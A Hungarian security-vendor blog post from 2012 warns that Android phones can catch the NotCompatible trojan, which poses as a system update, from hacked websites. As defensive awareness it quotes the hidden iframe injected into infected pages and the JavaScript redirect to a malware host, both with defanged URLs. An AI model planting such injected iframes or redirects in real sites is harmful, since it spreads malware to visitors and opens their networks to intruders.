Feltört weboldalakról is kerülhet vírus a telefonunkra

2012.05.13. 07:37 G Data

Feltört weboldalakra látogatva nemcsak számítógépünk, de okostelefonunk is megfertőződhet különböző kártevőkkel.

Szerencsére a veszély elhárítása nem túl nehéz, szokás szerint a józan eszünkre kell hallgatni, és betartani az unalomig ismert szabályokat.

A PC-s világban egyáltalán nem szokatlan, hogy a kártevőket feltört, vagy már direkt így készített weboldalak segítségével terjesztik. A gyanútlan felhasználó ellátogat az adott helyre, és megfelelő biztonsági szoftver hiányában már gépére is kerül a program, ami aztán zombivá változtatja rendszerét, ellopja személyes adatait, pénzét, és így tovább.

Ma viszont már nemcsak a PC-n, hanem az okostelefonokon érkező látogatót is egyre nagyobb veszélynek vannak kitéve. A nemrég felfedezett NotCompatible nevű trójai az első, ami ilyen drive-by-download módszerrel támadja az androidos mobilokat. A fertőzött oldalon egy rejtett iframe segítségével indítják el a letöltést, az alkalmazást viszont már a felhasználónak kell telepítenie. Ebben a bűnözők természetesen az ő felkészületlenségükre, gyanútlanságukra alapozzák várakozásaikat, a letöltött programot ugyanis rendszerfrissítésként próbálják beállítani.

Nem árt tudni, hogy az Androidhoz ilyen frissítést sosem fogunk ismeretlen weboldalakon keresztül megkapni. Ahhoz, hogy a telepítés sikerüljön, engedélyezni kell az alapból letiltott Ismeretlen források menüpontot az Android Beállítások / Alkalmazások menüjében.

A fertőzött weboldal alján általában a következő kódot találhatjuk meg:

<iframe

style=”visibility: hidden; display: none; display: none;”

src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}”></iframe>

Amennyiben a gaoanalitics.info oldalra egy PC-s böngészővel látogatunk el, Not Found hibaüzenetet kapunk, ha viszont a böngésző Androidként jelentkezik be, a következő szöveget kapjuk vissza:

<html><head></head><body><script type=”text/javascript”>window.top.location.href = “hxxp://androidonlinefix.info/fix1.php”;</script></body></html>

Ennek hatására indul a trójai letöltése.

A trójait a gaoanalitics.info és az androidonlinefix.info oldalakról kerül telefonunkra, míg a notcompatibleapp.eu egyfajta irányítóközpont szerepét tölti be.

A NotCompatible maga egy egyszerű TCP/IP proxy, ami nem is annyira a telefont veszélyezteti, mint inkább azokat a hálózatokat, amikhez a készülék csatlakozik, rajta keresztül ugyanis be lehet lépni a védett céges rendszerekbe is.

Forrás: The Official Logout Blog.

Tetszett a bejegyzés? Lájkolj minket a Facebookon!

Facebook Tumblr Tweet Pinterest Tetszik

Írj kommentet

A bejegyzés trackback címe:

https://virusirto.blog.hu/api/trackback/id/tr634505193

Kommentek:

A hozzászólások a vonatkozó jogszabályok értelmében felhasználói tartalomnak minősülnek, értük a szolgáltatás technikai üzemeltetője semmilyen felelősséget nem vállal, azokat nem ellenőrzi. Kifogás esetén forduljon a blog szerkesztőjéhez. Részletek a Felhasználási feltételekben és az adatvédelmi tájékoztatóban.

Nincsenek hozzászólások.